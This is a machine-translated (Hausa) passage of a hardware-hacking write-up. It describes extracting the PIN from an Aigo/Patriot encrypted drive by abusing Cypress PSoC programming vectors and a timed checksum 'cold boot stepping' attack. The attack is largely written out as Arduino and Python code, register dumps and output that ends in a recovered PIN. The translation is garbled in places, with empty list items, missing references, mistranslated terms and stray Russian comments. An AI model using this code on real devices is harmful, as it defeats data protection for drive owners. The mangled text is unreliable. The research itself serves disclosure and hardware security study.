Wannan shi ne kashi na biyu kuma na ƙarshe na labarin game da hacking na bayanan sirri na waje. Bari in tunatar da ku cewa kwanan nan abokin aiki ya kawo min babban rumbun kwamfutarka na Patriot (Aigo) SK8671, kuma na yanke shawarar juyawa, kuma yanzu ina raba abin da ya fito daga ciki. Kafin karantawa, tabbatar da karantawa labarai.
4. Mun fara ɗaukar juji daga na'urar filasha ta PSoC na ciki
Don haka, komai yana nuna (kamar yadda muka kafa a [bangaren farko]()) cewa an adana lambar PIN a cikin zurfin walƙiya na PSoC. Don haka, muna buƙatar karanta waɗannan zurfafan walƙiya. Gaban aikin da ya kamata:
- kula da "saduwa" tare da microcontroller;
- nemo hanyar bincika ko wannan “sadarwar” tana da kariya daga karantawa daga waje;
- nemo hanyar ƙetare kariyar.
Akwai wurare guda biyu inda yake da ma'ana don neman ingantaccen lambar PIN:
- ƙwaƙwalwar filasha ta ciki;
- SRAM, inda za a iya adana fil ɗin don kwatanta shi da lambar fil ɗin da mai amfani ya shigar.
Ina duba gaba, zan lura cewa har yanzu na sami nasarar ɗaukar juji na filasha na PSoC na ciki - ketare tsarin tsaro ta amfani da harin kayan masarufi da ake kira "binciken takalmin sanyi" - bayan juyar da ikon da ba a rubuta ba na ka'idar ISSP. Wannan ya bani damar zubar da ainihin lambar PIN kai tsaye.
$ ./psoc.py
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9Lambar shirin ƙarshe:
- ;
- .
5. ISP yarjejeniya
5.1. Menene ISSP
"Saduwa" tare da microcontroller na iya nufin abubuwa daban-daban: daga "mai sayarwa zuwa mai sayarwa" zuwa hulɗar ta amfani da ka'idar serial (misali, ICSP don Microchip's PIC).
Cypress yana da nasa ka'idojin mallakar wannan, wanda ake kira ISSP (in-system serial programming protocol), wanda aka siffanta wani bangare a cikin . kuma yana ba da wasu bayanai. Akwai kuma OpenSource daidai da ake kira HSSP (za mu yi amfani da shi nan gaba kadan). ISSP yana aiki kamar haka:
- sake yi PSoC;
- fitar da lambar sihirin zuwa fil ɗin bayanan serial na wannan PSoC; don shigar da yanayin shirye-shirye na waje;
- aika umarni, waxanda suke dogayen igiyoyi ne da ake kira “vectors”.
Takaddun na ISSP sun ayyana waɗannan nau'o'i don ƙananan umarni kawai:
- Farawa-1
- Farawa-2
- Farawa-3 (zaɓuɓɓukan 3V da 5V)
- ID-SETUP
- KARANTA-ID-KALMAR
- SET-BLOCK-NUM: 10011111010dddddddd111, inda dddddddd = toshe #
- GAME DA YAWA
- SHIRIN-BLOCK
- TABBATAR-SETUP
- KARANTA-BYTE: 10110aaaaaaZDDDDDDDDZ1, inda DDDDDDDD = bayanai suka fita, aaaaa = adireshin (6 bits)
- WRITE-BYTE: 10010aaaaaaddddddd111, inda dddddddd = bayanai a ciki, aaaaa = adireshi (6 bits)
- KASHI
- KYAUTA-SETUP
- KU KARANTA: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1, inda DDDDDDDDDDDDDDDD = bayanai fitar: na'urar checksum
- GAME DA KASHE
Misali, vector na Initialize-2:
1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111Duk vectors suna da tsayi iri ɗaya: 22 bits. Takaddun HSSP yana da wasu ƙarin bayani akan ISSP: "Wani nau'i na ISSP ba komai bane face ɗan jeri wanda ke wakiltar saitin umarni."
5.2. Demystifying Vectors
Bari mu gano abin da ke faruwa a nan. Da farko, na ɗauka cewa waɗannan nau'ikan nau'ikan nau'ikan nau'ikan umarnin M8C ne, amma bayan duba wannan hasashe, na gano cewa opcodes na ayyukan ba su dace ba.
Sai na yi google din vector a sama na ci karo wani binciken da marubucin, ko da yake bai yi cikakken bayani ba, ya ba da wasu shawarwari masu amfani: “Kowace koyarwa tana farawa da bita guda uku waɗanda suka yi daidai da ɗaya daga cikin abubuwan tunawa guda huɗu (karanta daga RAM, rubuta zuwa RAM, karanta rajista, rubuta rajista). Sannan akwai bits na adireshi guda 8, sai kuma bits data 8 (karanta ko rubuta) sannan a karshe sai da tasha guda uku.”
Sannan na sami damar tattara wasu bayanai masu fa'ida daga sashin Supervisory ROM (SROM). . SROM ROM ne mai wuyar ƙira a cikin PSoC wanda ke ba da ayyuka masu amfani (a irin wannan hanya zuwa Syscall) don lambar shirin da ke gudana a cikin sarari mai amfani:
- 00h: SWBootSake saitin
- 01h: ReadBlock
- 02h: WriteBlock
- 03h: Goge Block
- 06h: Karanta
- 07h: Duba Sum
- 08h: Calibrate0
- 09h: Calibrate1
Ta hanyar kwatanta sunayen vector zuwa ayyukan SROM, za mu iya taswirar ayyuka daban-daban waɗanda wannan ƙa'idar ke goyan bayan zuwa sigogin SROM da ake tsammani. Godiya ga wannan, za mu iya ƙaddamar da ragi uku na farko na vector ISSP:
- 100 => "wasa"
- 101 => "rdmem"
- 110 => "Kulawa"
- 111 => "Redreg"
Koyaya, ana iya samun cikakkiyar fahimtar hanyoyin kan guntu ta hanyar sadarwa kai tsaye tare da PSoC.
5.3. Sadarwa tare da PSoC
Tun da Dirk Petrautsky ya riga Lambar HSSP ta Cypress akan Arduino, Na yi amfani da Arduino Uno don haɗawa da mai haɗin ISSP na allon madannai.
Lura cewa a cikin bincikena, na canza lambar Dirk kaɗan kaɗan. Kuna iya samun gyara na akan GitHub: da kuma madaidaicin rubutun Python don sadarwa tare da Arduino, a cikin ma'ajina .
Don haka, ta amfani da Arduino, na fara amfani da ɓangarorin “hukuma” ne kawai don “sadarwa”. Na yi ƙoƙarin karanta ROM ɗin ciki ta amfani da umarnin VERIFY. Kamar yadda aka zata, ban iya yin wannan ba. Wataƙila saboda gaskiyar cewa an kunna bits kariya a cikin filasha.
Sannan na ƙirƙiri kaɗan daga cikin nawa masu sauƙi don rubutu da karanta ƙwaƙwalwar ajiya / masu rijista. Da fatan za a lura cewa za mu iya karanta SROM gaba ɗaya ko da yake an kare filasha!
5.4. Gano rajistan kan-chip
Bayan na kalli vectors na “warkar da su”, na gano cewa na’urar tana amfani da rajistar masu rajista (0xF8-0xFA) don ƙididdige lambobin M8C, waɗanda ake aiwatar da su kai tsaye, ta ketare kariyar. Wannan ya ba ni damar gudanar da opcodes iri-iri kamar "ADD", "MOV A, X", "PUSH" ko "JMP". Godiya gare su (ta duban illolin da suke da shi akan rajista) Na sami damar tantance wanne daga cikin rajistar da ba a ba da izini ba ne ainihin rajista na yau da kullun (A, X, SP da PC).
Sakamakon haka, lambar “rarraba” da kayan aikin HSSP_disas.rb suka samar yayi kama da haka (Na ƙara sharhi don bayyanawa):
--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00 # сброс флагов
[DE C0 1C] wrreg SP (f6), 0x00 # сброс SP
[9F 07 5C] wrmem KEY1, 0x3A # обязательный аргумент для SSC
[9F 20 7C] wrmem KEY2, 0x03 # аналогично
[DE A0 1C] wrreg PCh (f5), 0x00 # сброс PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03 # (LSB) ... до 3 ??
[9F 70 1C] wrmem POINTER, 0x80 # RAM-указатель для выходных данных
[DF 26 1C] wrreg opc1 (f9), 0x30 # Опкод 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40 # Опкод 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01 # BLOCK ID для вызова SSC
[DE 00 DC] wrreg A (f0), 0x06 # номер "Syscall" : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00 # Опкод для SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12 # Недокумментированная операция: выполнить внешний опкод
5.5. Tsaro bits
A wannan mataki na riga na iya sadarwa tare da PSoC, amma har yanzu ba ni da ingantaccen bayani game da matakan tsaro na filasha. Na yi mamakin gaskiyar cewa Cypress ba ya ba wa mai amfani da na'urar ta kowace hanya don bincika ko an kunna kariyar. Na zurfafa cikin Google don a ƙarshe fahimtar cewa an sabunta lambar HSSP da Cypress ya bayar bayan Dirk ya fitar da gyara. Say mai! Wannan sabon vector ya bayyana:
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00 # неизвестные аргументы
[9F E0 1C] wrmem 0xFF, 0x00 # аналогично
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10 # недокументированный syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Yin amfani da wannan vector (duba read_security_data a psoc.py), muna samun duk matakan tsaro a cikin SRAM a 0x80, inda akwai rago biyu akan kowane shinge mai kariya.
Sakamakon yana da damuwa: an kiyaye duk abin da ke cikin yanayin "kashe karatu da rubutu na waje". Saboda haka, ba kawai ba za mu iya karanta wani abu daga filasha ba, amma ba za mu iya rubuta komai ba (misali, don shigar da dumper ROM a can). Kuma hanya daya tilo da za a kashe kariyar ita ce goge gaba daya guntu. 🙁
6. Farko (kasa) hari: ROMX
Koyaya, zamu iya gwada dabara mai zuwa: tunda muna da ikon aiwatar da opcodes na sabani, me yasa ba'a aiwatar da ROMX, wanda ake amfani da shi don karanta ƙwaƙwalwar filasha? Wannan hanya tana da kyakkyawar damar samun nasara. Domin aikin ReadBlock wanda ke karanta bayanai daga SROM (wanda vectors ke amfani da shi) yana bincika ko an kira shi daga ISSP. Koyaya, opcode na ROMX mai yiwuwa bazai sami irin wannan cak ɗin ba. Don haka ga lambar Python (bayan ƙara ƴan azuzuwan mataimaka zuwa lambar Arduino):
for i in range(0, 8192):
write_reg(0xF0, i>>8) # A = 0
write_reg(0xF3, i&0xFF) # X = 0
exec_opcodes("x28x30x40") # ROMX, HALT, NOP
byte = read_reg(0xF0) # ROMX reads ROM[A|X] into A
print "%02x" % ord(byte[0]) # print ROM byteAbin takaici wannan lambar ba ta aiki. 🙁 Ko kuma yana aiki, amma muna samun namu opcodes a fitarwa (0x28 0x30 0x40)! Ba na tsammanin cewa daidaitaccen aikin na'urar wani bangare ne na kariyar karantawa. Wannan ya fi kama da dabarar injiniya: lokacin aiwatar da opcodes na waje, ana karkatar da bas ɗin ROM zuwa maƙasudin wucin gadi.
7. Hare-Hari na Biyu: Binciken Boot Cold
Tun da dabarar ROMX ba ta yi aiki ba, na fara tunanin wani bambancin wannan dabarar - wanda aka bayyana a cikin littafin. .
7.1. Aiwatarwa
Takaddun ISSP suna ba da fa'idodi masu zuwa don CHECKSUM-SETUP:
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Wannan ainihin yana kiran aikin SROM 0x07, kamar yadda aka gabatar a cikin takaddun (italics mine):
Wannan aikin tabbatar da kima. Yana ƙididdige ƙididdige ƙididdiga na 16-bit na adadin ƙayyadaddun tubalan masu amfani a cikin bankin filashi ɗaya, farawa daga sifili. Ana amfani da ma'aunin BLOCKID don wuce adadin tubalan da za a yi amfani da su yayin ƙididdige adadin cak. Ƙimar "1" kawai za ta ƙididdige adadin cak don toshe sifili; alhali "0" zai sa a ƙididdige jimillar cak ɗin duk bulogi 256 na bankin flash ɗin. Ana dawo da kuɗin rajistan 16-bit ta KEY1 da KEY2. Ma'aunin KEY1 yana adana ƙananan oda 8 na checksum, kuma ma'aunin KEY2 yana adana babban oda 8. Don na'urori masu bankunan walƙiya da yawa, ana kiran aikin checksum ga kowannensu daban. An saita lambar bankin da za ta yi aiki da ita ta FLS_PR1 rajista (ta hanyar saita bit a cikinta daidai da bankin filashi na manufa).
Lura cewa wannan ƙididdiga ce mai sauƙi: ana ƙara bytes ɗaya bayan ɗaya; babu CRC mai ban mamaki. Bugu da ƙari, sanin cewa M8C core yana da ƙananan saiti na rajista, na ɗauka cewa lokacin da ake ƙididdige adadin kuɗin, za a yi rikodin ƙididdiga masu tsaka-tsaki a cikin masu canji iri ɗaya wanda zai iya zuwa fitarwa: KEY1 (0xF8) / KEY2 ( 0xF9 ku).
Don haka a ka'idar harina yayi kama da haka:
- Muna haɗi ta hanyar ISSP.
- Muna fara lissafin kididdigar ta amfani da CHECKSUM-SETUP vector.
- Mun sake kunna processor bayan ƙayyadadden lokaci T.
- Mun karanta RAM don samun checksum C na yanzu.
- Maimaita matakai na 3 da 4, ƙara T kadan kowane lokaci.
- Muna dawo da bayanai daga faifan faifai ta hanyar cire checksum C na baya daga na yanzu.
Koyaya, akwai matsala: Initialize-1 vector wanda dole ne mu aika bayan sake kunnawa ya sake rubuta KEY1 da KEY2:
1100101000000000000000 # Магия, переводящая PSoC в режим программирования
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A # контрольная сумма перезаписывается здесь
[9F 20 7C] wrmem KEY2, 0x03 # и здесь
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09 # SROM-функция 9
[DF 00 1C] wrreg opc0 (f8), 0x00 # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Wannan lambar tana sake rubuta adadin kuɗin mu mai daraja ta hanyar kiran Calibrate1 (SROM function 9)… Wataƙila za mu iya aika lambar sihirin kawai (daga farkon lambar da ke sama) don shigar da yanayin shirye-shirye, sannan karanta SRAM? Kuma a, yana aiki! Lambar Arduino da ke aiwatar da wannan harin abu ne mai sauƙi:
case Cmnd_STK_START_CSUM:
checksum_delay = ((uint32_t)getch())<<24;
checksum_delay |= ((uint32_t)getch())<<16;
checksum_delay |= ((uint32_t)getch())<<8;
checksum_delay |= getch();
if(checksum_delay > 10000) {
ms_delay = checksum_delay/1000;
checksum_delay = checksum_delay%1000;
}
else {
ms_delay = 0;
}
send_checksum_v();
if(checksum_delay)
delayMicroseconds(checksum_delay);
delay(ms_delay);
start_pmode();- Karanta checkum_delay.
- Gudanar da lissafin checksum (send_checksum_v).
- Jira wani ƙayyadadden lokaci; la'akari da wadannan matsaloli:
- Na ɓata lokaci mai yawa har sai da na gano abin da ya faru yana aiki daidai kawai tare da jinkirin da bai wuce 16383 μs ba;
- sa'an nan kuma sake kashe adadin lokaci guda har sai na gano cewa jinkiriMicroseconds, idan 0 ya wuce zuwa gare shi azaman shigarwa, yana aiki gaba ɗaya ba daidai ba!
- Sake kunna PSoC cikin yanayin shirye-shirye (kawai muna aika lambar sihirin, ba tare da aika abubuwan farawa ba).
Lambar ƙarshe a Python:
for delay in range(0, 150000): # задержка в микросекундах
for i in range(0, 10): # количество считывания для каждойиз задержек
try:
reset_psoc(quiet=True) # перезагрузка и вход в режим программирования
send_vectors() # отправка инициализирующих векторов
ser.write("x85"+struct.pack(">I", delay)) # вычислить контрольную сумму + перезагрузиться после задержки
res = ser.read(1) # считать arduino ACK
except Exception as e:
print e
ser.close()
os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # открыть последовательный порт
continue
print "%05d %02X %02X %02X" % (delay, # считать RAM-байты
read_regb(0xf1),
read_ramb(0xf8),
read_ramb(0xf9))A takaice, abin da wannan code yake yi:
- Sake kunna PSoC (kuma yana aika lambar sihiri).
- Yana aiko da cikakkun matakan farawa.
- Yana kiran aikin Arduino Cmnd_STK_START_CSUM (0x85), inda aka wuce jinkirin dakika guda a matsayin ma'auni.
- Yana karanta checksum (0xF8 da 0xF9) da kuma rijistar da ba ta da izini 0xF1.
Ana aiwatar da wannan lambar sau 10 a cikin microsecond 1. An haɗa 0xF1 a nan saboda ita ce kawai rajistar da ta canza lokacin ƙididdige adadin kuɗi. Wataƙila wani nau'in maɓalli ne na ɗan lokaci wanda sashin ilimin lissafi ke amfani dashi. Ka lura da mummunan hack ɗin da nake amfani da shi don sake saita Arduino ta amfani da picocom lokacin da Arduino ya daina nuna alamun rayuwa (babu dalilin da yasa).
7.2. Karanta sakamakon
Sakamakon rubutun Python yayi kama da wannan (a sauƙaƙe don karantawa):
DELAY F1 F8 F9 # F1 – вышеупомянутый неизвестный регистр
# F8 младший байт контрольной суммы
# F9 старший байт контрольной суммы
00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00 # контрольная сумма сбрасывается в 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00 # 1-й байт: 0x0080-0x0000 = 0x80
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00 # 2-й байт: 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01 # понятия не имею, что здесь происходит
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00 # Снова E7?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00 # Хмммммм
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01 # А, дошло! Вот он же перенос в старший байт
00063 01 17 01
[...]
00075 CC 17 01 # Итак, 0x117-0xE7: 0x30Ana faɗin haka, muna da matsala: tunda muna aiki tare da ainihin checksum, null byte baya canza ƙimar karantawa. Koyaya, tunda gabaɗayan tsarin lissafin (8192 bytes) yana ɗaukar daƙiƙa 0,1478 (tare da ƴan bambance-bambance a duk lokacin da aka gudanar), wanda yayi daidai da kusan 18,04 μs kowace byte, zamu iya amfani da wannan lokacin don duba ƙimar checksum a lokutan da suka dace. Don gudanar da farko, ana karanta komai cikin sauƙi, tunda tsawon lokacin aikin lissafin koyaushe kusan iri ɗaya ne. Koyaya, ƙarshen wannan jujjuya bai cika daidai ba saboda “ƙananan ɓata lokaci” akan kowane gudu yana ƙara zama mai mahimmanci:
134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DDWannan jujjuyawa 10 ke nan don kowane jinkiri na daƙiƙa guda. Jimlar lokacin aiki don zubar da duk 8192 bytes na filasha ta filasha kusan awanni 48 ne.
7.3. Flash binaryar sake ginawa
Har yanzu ban kammala rubuta lambar da za ta sake gina lambar shirin na filasha ba, la'akari da duk ɓata lokaci. Koyaya, na riga na dawo da farkon wannan lambar. Don tabbatar da na yi shi daidai, na kwakkwance shi ta amfani da m8cdis:
0000: 80 67 jmp 0068h ; Reset vector
[...]
0068: 71 10 or F,010h
006a: 62 e3 87 mov reg[VLT_CR],087h
006d: 70 ef and F,0efh
006f: 41 fe fb and reg[CPU_SCR1],0fbh
0072: 50 80 mov A,080h
0074: 4e swap A,SP
0075: 55 fa 01 mov [0fah],001h
0078: 4f mov X,SP
0079: 5b mov A,X
007a: 01 03 add A,003h
007c: 53 f9 mov [0f9h],A
007e: 55 f8 3a mov [0f8h],03ah
0081: 50 06 mov A,006h
0083: 00 ssc
[...]
0122: 18 pop A
0123: 71 10 or F,010h
0125: 43 e3 10 or reg[VLT_CR],010h
0128: 70 00 and F,000h ; Paging mode changed from 3 to 0
012a: ef 62 jacc 008dh
012c: e0 00 jacc 012dh
012e: 71 10 or F,010h
0130: 62 e0 02 mov reg[OSC_CR0],002h
0133: 70 ef and F,0efh
0135: 62 e2 00 mov reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff jmp 013bh
013d: 50 08 mov A,008h
013f: 7f retGa alama mai ma'ana!
7.4. Nemo adireshin ajiyar lambar PIN
Yanzu da za mu iya karanta checksum a lokutan da muke buƙata, za mu iya bincika yadda da kuma inda yake canzawa a sauƙaƙe lokacin da muka:
- shigar da lambar PIN mara daidai;
- canza fil code.
Na farko, don nemo kusan adireshin ma'ajiyar, Na ɗauki juji na checksum a cikin ƙarin ms 10 bayan sake kunnawa. Sannan na shigar da PIN mara kuskure kuma nayi haka.
Sakamakon bai yi daɗi sosai ba, tun da akwai canje-canje da yawa. Amma a ƙarshe na sami damar tantance cewa checksum ya canza wani wuri tsakanin 120000 µs da 140000 µs na jinkiri. Amma "pincode" da na nuna a can gaba ɗaya ba daidai ba ne - saboda wani kayan tarihi na tsarin jinkiriMicrosecond, wanda ke yin abubuwa masu ban mamaki lokacin da 0 ya wuce zuwa gare ta.
Bayan haka, bayan shafe kusan sa'o'i 3, na tuna cewa tsarin SROM da ake kira CheckSum yana karɓar gardama a matsayin shigarwa wanda ke ƙayyade adadin tubalan na checksum! Wannan. za mu iya sauƙaƙe adreshin ajiya na lambar PIN da ma'aunin "yunƙurin da ba daidai ba", tare da daidaiton har zuwa toshe 64-byte.
Gudun farko na ya haifar da sakamako mai zuwa:
Sannan na canza lambar PIN daga "123456" zuwa "1234567" kuma na samu:
Don haka, da alama ana adana lambar PIN da ma'aunin yunƙurin da ba daidai ba a cikin toshe mai lamba 126.
7.5. Daukar juji mai lamba 126
Toshe #126 yakamata a kasance a wani wuri kusa da 125x64x18 = 144000μs, daga farkon lissafin checksum, a cikin cikakken juji na, kuma yana da kyau sosai. Bayan haka, bayan fitar da dumps marasa inganci da hannu (saboda tarin “kananan ɓata lokaci”), na ƙare samun waɗannan bytes (a ƙarshen 145527 μs):
A bayyane yake cewa an adana lambar PIN a cikin sigar da ba a ɓoye ba! Wadannan dabi'un, ba shakka, ba a rubuta su a cikin lambobin ASCII ba, amma kamar yadda ya bayyana, suna nuna karatun da aka ɗauka daga maɓalli mai ƙarfi.
A ƙarshe, na sake gwada wasu gwaje-gwaje don gano inda aka adana ma'aunin ƙwaƙƙwaran ƙoƙari. Ga sakamakon:
0xFF - yana nufin "kokarin 15" kuma yana raguwa tare da kowane ƙoƙari na kasa.
7.6. Maido da lambar PIN
Ga mummuna code na wanda ya haɗa abubuwan da ke sama tare:
def dump_pin():
pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
last_csum = 0
pin_bytes = []
for delay in range(145495, 145719, 16):
csum = csum_at(delay, 1)
byte = (csum-last_csum)&0xFF
print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
pin_bytes.append(byte)
last_csum = csum
print "PIN: ",
for i in range(0, len(pin_bytes)):
if pin_bytes[i] in pin_map:
print pin_map[pin_bytes[i]],
printGa sakamakon aiwatar da shi:
$ ./psoc.py
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9Hooray! Ayyuka!
Da fatan za a lura cewa ƙimar jinkirin da na yi amfani da ita na iya dacewa da takamaiman PSoC guda ɗaya - wanda na yi amfani da shi.
8. Menene na gaba?
Don haka, bari mu taƙaita a gefen PSoC, a cikin mahallin tuƙi na Aigo:
- za mu iya karanta SRAM ko da an kiyaye shi;
- Za mu iya ƙetare kariyar kariyar gogewa ta amfani da harin sanyi mai sanyi da karanta lambar PIN kai tsaye.
Koyaya, harin namu yana da wasu kurakurai saboda matsalolin aiki tare. Ana iya inganta shi kamar haka:
- rubuta mai amfani don ƙaddamar da bayanan fitarwa daidai da aka samu sakamakon harin "ƙananan takalmin sanyi";
- yi amfani da na'urar FPGA don ƙirƙirar ƙarin madaidaicin jinkirin lokaci (ko amfani da masu ƙidayar kayan aikin Arduino);
- gwada wani harin: shigar da lambar PIN da ba daidai ba da gangan, sake yi kuma zubar da RAM, da fatan za a adana madaidaicin lambar PIN a RAM don kwatantawa. Duk da haka, wannan ba shi da sauƙi a yi akan Arduino, tun da matakin siginar Arduino shine 5 volts, yayin da hukumar da muke nazarin aiki tare da sigina na 3,3 volt.
Wani abu mai ban sha'awa wanda za'a iya gwada shi shine yin wasa tare da matakin ƙarfin lantarki don ƙetare kariyar karantawa. Idan wannan hanyar ta yi aiki, za mu iya samun cikakkun bayanai masu inganci daga faifan filasha - maimakon dogaro da karanta lissafin kuɗi tare da jinkirin lokaci.
Tun da SROM mai yiwuwa yana karanta raƙuman gadi ta hanyar kiran tsarin ReadBlock, za mu iya yin abu ɗaya da a kan Dmitry Nedospasov's blog - sake aiwatar da harin Chris Gerlinski, wanda aka sanar a taron. .
Wani abu mai ban sha'awa da za a iya yi shi ne a cire karar daga guntu: don ɗaukar juji na SRAM, gano kiran tsarin da ba a rubuta ba da lahani.
9. Kammalawa
Don haka, kariyar wannan tuƙi yana barin abin da ake so, saboda yana amfani da microcontroller na yau da kullun (ba “hardened”) don adana lambar PIN ba… Plus, ban duba (har yanzu) yadda abubuwa ke tafiya tare da bayanai ba. boye-boye akan wannan na'urar!
Me za ku iya ba da shawara ga Aigo? Bayan nazarin nau'ikan nau'ikan nau'ikan rumbun kwamfyuta na HDD, a cikin 2015 na yi a kan SyScan, wanda a ciki ya yi nazarin matsalolin tsaro na wasu na'urorin HDD masu yawa na waje, kuma ya ba da shawarwari kan abin da za a iya inganta a cikinsu. 🙂
Na shafe karshen mako biyu da maraice da yawa ina yin wannan bincike. Jimlar kusan awa 40. Ƙididdigewa daga farkon (lokacin da na buɗe faifai) zuwa ƙarshe (jib ɗin lambar PIN). Haka sa'o'i 40 ɗin sun haɗa da lokacin da na kashe rubuta wannan labarin. Tafiya ce mai ban sha'awa.
source: www.habr.com